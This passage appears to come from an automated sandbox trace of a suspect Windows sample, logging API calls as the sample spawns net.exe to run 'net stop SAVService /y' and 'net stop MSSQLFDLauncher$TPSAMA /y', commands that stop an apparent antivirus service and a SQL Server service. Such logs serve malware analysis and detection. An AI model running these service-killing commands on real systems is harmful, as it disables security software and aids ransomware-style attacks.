HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 108 os_tid = 0xbf0 [0039.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfedc | out: lpSystemTimeAsFileTime=0xdfedc*(dwLowDateTime=0xe19d04e0, dwHighDateTime=0x1d57a86)) [0039.282] GetCurrentProcessId () returned 0xbec [0039.282] GetCurrentThreadId () returned 0xbf0 [0039.282] GetTickCount () returned 0x1144d27 [0039.282] QueryPerformanceCounter (in: lpPerformanceCount=0xdfed4 | out: lpPerformanceCount=0xdfed4*=15956660699) returned 1 [0039.282] GetModuleHandleA (lpModuleName=0x0) returned 0x770000 [0039.282] __set_app_type (_Type=0x1) [0039.282] __p__fmode () returned 0x74eb31f4 [0039.282] __p__commode () returned 0x74eb31fc [0039.282] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x77ffe6) returned 0x0 [0039.283] __getmainargs (in: _Argc=0x789064, _Argv=0x78906c, _Env=0x789068, _DoWildCard=0, _StartInfo=0x789024 | out: _Argc=0x789064, _Argv=0x78906c, _Env=0x789068) returned 0 [0039.283] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0039.283] GetConsoleOutputCP () returned 0x1b5 [0039.287] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x789080 | out: lpCPInfo=0x789080) returned 1 [0039.287] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.290] sprintf_s (in: _DstBuf=0xdfe94, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0039.290] setlocale (category=0, locale=".437") returned="English_United States.437" [0039.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0039.292] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0039.292] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SAVService /y" [0039.292] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdfc60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0039.292] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x68) returned 0x233c10 [0039.292] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0039.292] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfe64 | out: Buffer=0xdfe64*=0x231c70) returned 0x0 [0039.292] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfe64 | out: Buffer=0xdfe64*=0x231c88) returned 0x0 [0039.292] _fileno (_File=0x74eb2900) returned -2 [0039.293] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0039.293] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0039.293] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0039.293] _wcsicmp (_String1="config", _String2="stop") returned -16 [0039.293] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0039.293] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0039.293] _wcsicmp (_String1="file", _String2="stop") returned -13 [0039.293] _wcsicmp (_String1="files", _String2="stop") returned -13 [0039.293] _wcsicmp (_String1="group", _String2="stop") returned -12 [0039.293] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0039.293] _wcsicmp (_String1="help", _String2="stop") returned -11 [0039.293] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0039.293] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0039.293] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0039.293] _wcsicmp (_String1="session", _String2="stop") returned -15 [0039.293] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0039.293] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0039.293] _wcsicmp (_String1="share", _String2="stop") returned -12 [0039.293] _wcsicmp (_String1="start", _String2="stop") returned -14 [0039.293] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0039.293] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0039.293] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0039.293] _wcsicmp (_String1="accounts", _String2="SAVService") returned -18 [0039.293] _wcsicmp (_String1="computer", _String2="SAVService") returned -16 [0039.293] _wcsicmp (_String1="config", _String2="SAVService") returned -16 [0039.293] _wcsicmp (_String1="continue", _String2="SAVService") returned -16 [0039.293] _wcsicmp (_String1="cont", _String2="SAVService") returned -16 [0039.293] _wcsicmp (_String1="file", _String2="SAVService") returned -13 [0039.293] _wcsicmp (_String1="files", _String2="SAVService") returned -13 [0039.293] _wcsicmp (_String1="group", _String2="SAVService") returned -12 [0039.293] _wcsicmp (_String1="groups", _String2="SAVService") returned -12 [0039.293] _wcsicmp (_String1="help", _String2="SAVService") returned -11 [0039.293] _wcsicmp (_String1="helpmsg", _String2="SAVService") returned -11 [0039.294] _wcsicmp (_String1="localgroup", _String2="SAVService") returned -7 [0039.294] _wcsicmp (_String1="pause", _String2="SAVService") returned -3 [0039.294] _wcsicmp (_String1="session", _String2="SAVService") returned 4 [0039.294] _wcsicmp (_String1="sessions", _String2="SAVService") returned 4 [0039.294] _wcsicmp (_String1="sess", _String2="SAVService") returned 4 [0039.294] _wcsicmp (_String1="share", _String2="SAVService") returned 7 [0039.294] _wcsicmp (_String1="start", _String2="SAVService") returned 19 [0039.294] _wcsicmp (_String1="stats", _String2="SAVService") returned 19 [0039.294] _wcsicmp (_String1="statistics", _String2="SAVService") returned 19 [0039.294] _wcsicmp (_String1="stop", _String2="SAVService") returned 19 [0039.294] _wcsicmp (_String1="time", _String2="SAVService") returned 1 [0039.294] _wcsicmp (_String1="user", _String2="SAVService") returned 2 [0039.294] _wcsicmp (_String1="users", _String2="SAVService") returned 2 [0039.294] _wcsicmp (_String1="msg", _String2="SAVService") returned -6 [0039.294] _wcsicmp (_String1="messenger", _String2="SAVService") returned -6 [0039.294] _wcsicmp (_String1="receiver", _String2="SAVService") returned -1 [0039.294] _wcsicmp (_String1="rcv", _String2="SAVService") returned -1 [0039.294] _wcsicmp (_String1="netpopup", _String2="SAVService") returned -5 [0039.294] _wcsicmp (_String1="redirector", _String2="SAVService") returned -1 [0039.294] _wcsicmp (_String1="redir", _String2="SAVService") returned -1 [0039.294] _wcsicmp (_String1="rdr", _String2="SAVService") returned -1 [0039.294] _wcsicmp (_String1="workstation", _String2="SAVService") returned 4 [0039.294] _wcsicmp (_String1="work", _String2="SAVService") returned 4 [0039.294] _wcsicmp (_String1="wksta", _String2="SAVService") returned 4 [0039.294] _wcsicmp (_String1="prdr", _String2="SAVService") returned -3 [0039.294] _wcsicmp (_String1="devrdr", _String2="SAVService") returned -15 [0039.294] _wcsicmp (_String1="lanmanworkstation", _String2="SAVService") returned -7 [0039.294] _wcsicmp (_String1="server", _String2="SAVService") returned 4 [0039.294] _wcsicmp (_String1="svr", _String2="SAVService") returned 21 [0039.294] _wcsicmp (_String1="srv", _String2="SAVService") returned 17 [0039.294] _wcsicmp (_String1="lanmanserver", _String2="SAVService") returned -7 [0039.294] _wcsicmp (_String1="alerter", _String2="SAVService") returned -18 [0039.294] _wcsicmp (_String1="netlogon", _String2="SAVService") returned -5 [0039.295] _wcsupr (in: _String="SAVService" | out: _String="SAVSERVICE") returned="SAVSERVICE" [0039.295] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2354c8 [0039.297] GetServiceKeyNameW (in: hSCManager=0x2354c8, lpDisplayName="SAVSERVICE", lpServiceName=0x78aaf0, lpcchBuffer=0xdfe00 | out: lpServiceName="", lpcchBuffer=0xdfe00) returned 0 [0039.298] _wcsicmp (_String1="msg", _String2="SAVSERVICE") returned -6 [0039.298] _wcsicmp (_String1="messenger", _String2="SAVSERVICE") returned -6 [0039.298] _wcsicmp (_String1="receiver", _String2="SAVSERVICE") returned -1 [0039.298] _wcsicmp (_String1="rcv", _String2="SAVSERVICE") returned -1 [0039.298] _wcsicmp (_String1="redirector", _String2="SAVSERVICE") returned -1 [0039.298] _wcsicmp (_String1="redir", _String2="SAVSERVICE") returned -1 [0039.298] _wcsicmp (_String1="rdr", _String2="SAVSERVICE") returned -1 [0039.298] _wcsicmp (_String1="workstation", _String2="SAVSERVICE") returned 4 [0039.298] _wcsicmp (_String1="work", _String2="SAVSERVICE") returned 4 [0039.298] _wcsicmp (_String1="wksta", _String2="SAVSERVICE") returned 4 [0039.298] _wcsicmp (_String1="prdr", _String2="SAVSERVICE") returned -3 [0039.298] _wcsicmp (_String1="devrdr", _String2="SAVSERVICE") returned -15 [0039.298] _wcsicmp (_String1="lanmanworkstation", _String2="SAVSERVICE") returned -7 [0039.298] _wcsicmp (_String1="server", _String2="SAVSERVICE") returned 4 [0039.298] _wcsicmp (_String1="svr", _String2="SAVSERVICE") returned 21 [0039.298] _wcsicmp (_String1="srv", _String2="SAVSERVICE") returned 17 [0039.298] _wcsicmp (_String1="lanmanserver", _String2="SAVSERVICE") returned -7 [0039.298] _wcsicmp (_String1="alerter", _String2="SAVSERVICE") returned -18 [0039.298] _wcsicmp (_String1="netlogon", _String2="SAVSERVICE") returned -5 [0039.298] NetServiceControl (in: servername=0x0, service="SAVSERVICE", opcode=0x0, arg=0x0, bufptr=0xdfdfc | out: bufptr=0xdfdfc) returned 0x889 [0039.299] wcscpy_s (in: _Destination=0x78a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0039.299] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0039.300] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x78b338, nSize=0x800, Arguments=0x789dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0039.301] GetFileType (hFile=0x26c) returned 0x3 [0039.301] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x233ff8 [0039.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x233ff8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0039.301] WriteFile (in: hFile=0x26c, lpBuffer=0x233ff8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xdfd3c, lpOverlapped=0x0 | out: lpBuffer=0x233ff8*, lpNumberOfBytesWritten=0xdfd3c*=0x1e, lpOverlapped=0x0) returned 1 [0039.301] LocalFree (hMem=0x233ff8) returned 0x0 [0039.301] GetFileType (hFile=0x26c) returned 0x3 [0039.301] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2362a0 [0039.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2362a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n#", lpUsedDefaultChar=0x0) returned 2 [0039.301] WriteFile (in: hFile=0x26c, lpBuffer=0x2362a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdfd3c, lpOverlapped=0x0 | out: lpBuffer=0x2362a0*, lpNumberOfBytesWritten=0xdfd3c*=0x2, lpOverlapped=0x0) returned 1 [0039.301] LocalFree (hMem=0x2362a0) returned 0x0 [0039.301] _ultow (in: _Dest=0x889, _Radix=916844 | out: _Dest=0x889) returned="2185" [0039.301] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x78b338, nSize=0x800, Arguments=0x789dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0039.301] GetFileType (hFile=0x26c) returned 0x3 [0039.301] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2362a0 [0039.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2362a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0039.302] WriteFile (in: hFile=0x26c, lpBuffer=0x2362a0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xdfd48, lpOverlapped=0x0 | out: lpBuffer=0x2362a0*, lpNumberOfBytesWritten=0xdfd48*=0x34, lpOverlapped=0x0) returned 1 [0039.302] LocalFree (hMem=0x2362a0) returned 0x0 [0039.302] GetFileType (hFile=0x26c) returned 0x3 [0039.302] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2362a0 [0039.302] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2362a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n#", lpUsedDefaultChar=0x0) returned 2 [0039.302] WriteFile (in: hFile=0x26c, lpBuffer=0x2362a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdfd48, lpOverlapped=0x0 | out: lpBuffer=0x2362a0*, lpNumberOfBytesWritten=0xdfd48*=0x2, lpOverlapped=0x0) returned 1 [0039.302] LocalFree (hMem=0x2362a0) returned 0x0 [0039.302] NetApiBufferFree (Buffer=0x231c70) returned 0x0 [0039.302] NetApiBufferFree (Buffer=0x231c88) returned 0x0 [0039.302] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SAVService /y" [0039.302] exit (_Code=2) Process: id = "41" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x49b3c000" os_pid = "0xbf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLFDLauncher$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 109 os_tid = 0xbf8 Process: id = "42" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x48f8d000" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0xbf4" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 110 os_tid = 0x804 [0039.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ff808 | out: lpSystemTimeAsFileTime=0x1ff808*(dwLowDateTime=0xe1b73400, dwHighDateTime=0x1d57a86)) [0039.451] GetCurrentProcessId () returned 0xbfc [0039.451] GetCurrentThreadId () returned 0x804 [0039.451] GetTickCount () returned 0x1144dd3 [0039.451] QueryPerformanceCounter (in: lpPerformanceCount=0x1ff800 | out: lpPerformanceCount=0x1ff800*=15973570777) returned 1 [0039.451] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0039.451] __set_app_type (_Type=0x1) [0039.451] __p__fmode () returned 0x74eb31f4 [0039.451] __p__commode () returned 0x74eb31fc [0039.452] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8ffe6) returned 0x0 [0039.452] __getmainargs (in: _Argc=0x99064, _Argv=0x9906c, _Env=0x99068, _DoWildCard=0, _StartInfo=0x99024 | out: _Argc=0x99064, _Argv=0x9906c, _Env=0x99068) returned 0 [0039.452] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0039.452] GetConsoleOutputCP () returned 0x1b5 [0039.452] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x99080 | out: lpCPInfo=0x99080) returned 1 [0039.452] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.455] sprintf_s (in: _DstBuf=0x1ff7c0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0039.455] setlocale (category=0, locale=".437") returned="English_United States.437" [0039.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0039.457] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0039.457] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPSAMA /y" [0039.457] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ff58c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0039.457] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x80) returned 0x3f4bf8 [0039.457] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0039.458] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff790 | out: Buffer=0x1ff790*=0x3f1c90) returned 0x0 [0039.458] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff790 | out: Buffer=0x1ff790*=0x3f1ca8) returned 0x0 [0039.458] _fileno (_File=0x74eb2900) returned -2 [0039.458] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0039.458] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0039.458] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0039.458] _wcsicmp (_String1="config", _String2="stop") returned -16 [0039.458] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0039.458] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0039.458] _wcsicmp (_String1="file", _String2="stop") returned -13 [0039.458] _wcsicmp (_String1="files", _String2="stop") returned -13 [0039.458] _wcsicmp (_String1="group", _String2="stop") returned -12 [0039.458] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0039.458] _wcsicmp (_String1="help", _String2="stop") returned -11 [0039.458] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0039.458] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0039.458] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0039.458] _wcsicmp (_String1="session", _String2="stop") returned -15 [0039.458] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0039.458] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0039.458] _wcsicmp (_String1="share", _String2="stop") returned -12 [0039.458] _wcsicmp (_String1="start", _String2="stop") returned -14 [0039.458] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0039.458] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0039.458] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0039.458] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$TPSAMA") returned -12 [0039.458] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$TPSAMA") returned -10 [0039.459] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$TPSAMA") returned -10 [0039.459] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$TPSAMA") returned -10 [0039.459] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$TPSAMA") returned -10 [0039.459] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$TPSAMA") returned -7 [0039.459] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$TPSAMA") returned -7 [0039.459] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$TPSAMA") returned -6 [0039.459] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$TPSAMA") returned -6 [0039.459] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$TPSAMA") returned -5 [0039.459] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$TPSAMA") returned -5 [0039.459] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$TPSAMA") returned -1 [0039.459] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$TPSAMA") returned 3 [0039.459] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.459] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.459] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.459] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.459] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.459] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.459] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.459] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.459] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$TPSAMA") returned 7 [0039.459] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$TPSAMA") returned 8 [0039.459] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$TPSAMA") returned 8 [0039.459] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$TPSAMA") returned -12 [0039.459] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$TPSAMA") returned -14 [0039.459] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0039.459] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0039.459] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$TPSAMA") returned 1 [0039.459] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0039.459] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0039.459] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0039.459] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$TPSAMA") returned 10 [0039.459] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$TPSAMA") returned 10 [0039.459] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$TPSAMA") returned 10 [0039.460] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$TPSAMA") returned 3 [0039.460] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$TPSAMA") returned -9 [0039.460] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$TPSAMA") returned -1 [0039.460] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.460] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.460] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0039.460] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$TPSAMA") returned -1 [0039.460] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$TPSAMA") returned -12 [0039.460] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$TPSAMA") returned 1 [0039.460] _wcsupr (in: _String="MSSQLFDLauncher$TPSAMA" | out: _String="MSSQLFDLAUNCHER$TPSAMA") returned="MSSQLFDLAUNCHER$TPSAMA" [0039.460] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3f54c8 [0039.463] GetServiceKeyNameW (in: hSCManager=0x3f54c8, lpDisplayName="MSSQLFDLAUNCHER$TPSAMA", lpServiceName=0x9aaf0, lpcchBuffer=0x1ff72c | out: lpServiceName="", lpcchBuffer=0x1ff72c) returned 0 [0039.463] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -12 [0039.463] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -14 [0039.463] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0039.463] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0039.463] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0039.463] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0039.463] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0039.463] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 10 [0039.463] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 10 [0039.463] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 10 [0039.463] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 3 [0039.463] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -9 [0039.463] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -1 [0039.463] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 6 [0039.463] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 6 [0039.463] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 6 [0039.463] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -1 [0039.464] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -12 [0039.464] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 1 [0039.464] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x1ff728 | out: bufptr=0x1ff728) returned 0x889 [0039.464] wcscpy_s (in: _Destination=0x9a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0039.464] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0039.465] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x9b338, nSize=0x800, Arguments=0x99dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0039.466] GetFileType (hFile=0x26c) returned 0x3 [0039.466] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3f3ca0 [0039.466] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3f3ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0039.466] WriteFile (in: hFile=0x26c, lpBuffer=0x3f3ca0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ff668, lpOverlapped=0x0 | out: lpBuffer=0x3f3ca0*, lpNumberOfBytesWritten=0x1ff668*=0x1e, lpOverlapped=0x0) returned 1 [0039.466] LocalFree (hMem=0x3f3ca0) returned 0x0 [0039.466] GetFileType (hFile=0x26c) returned 0x3 [0039.466] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f6290 [0039.466] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3f6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n?", lpUsedDefaultChar=0x0) returned 2 [0039.466] WriteFile (in: hFile=0x26c, lpBuffer=0x3f6290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff668, lpOverlapped=0x0 | out: lpBuffer=0x3f6290*, lpNumberOfBytesWritten=0x1ff668*=0x2, lpOverlapped=0x0) returned 1 [0039.466] LocalFree (hMem=0x3f6290) returned 0x0 [0039.466] _ultow (in: _Dest=0x889, _Radix=2094744 | out: _Dest=0x889) returned="2185" [0039.466] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x9b338, 